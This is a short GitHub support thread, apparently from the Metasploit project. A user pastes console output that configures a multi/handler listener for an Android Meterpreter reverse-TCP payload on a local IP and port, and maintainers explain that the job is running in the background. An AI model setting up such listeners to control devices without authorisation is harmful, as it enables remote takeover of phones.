Closed ramzios25 closed 6 years ago
What are you asking?
meterpreter cant start its stop right here msf exploit(handler) > exploit [*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.6:4444
It's running as a background job. It's fine.
We rolled this functionality back. You should update. Also, this is not the right repo for this (support) issue.
If you have a support question, please ask on IRC (https://metasploit.help.rapid7.com/docs/joining-the-metasploit-irc-channel) or Slack (http://r-7.co/metaSlack).
what i got when i try android payload
msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
LHOST yes The listen address LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.1.6 LHOST => 192.168.1.6 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
LHOST 192.168.1.6 yes The listen address LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > exploit [*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.6:4444 msf exploit(handler) >
ps: this what i got the probleme msf exploit(handler) > exploit [*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.6:4444 msf exploit(handler) > im using ip internal not with forwarding port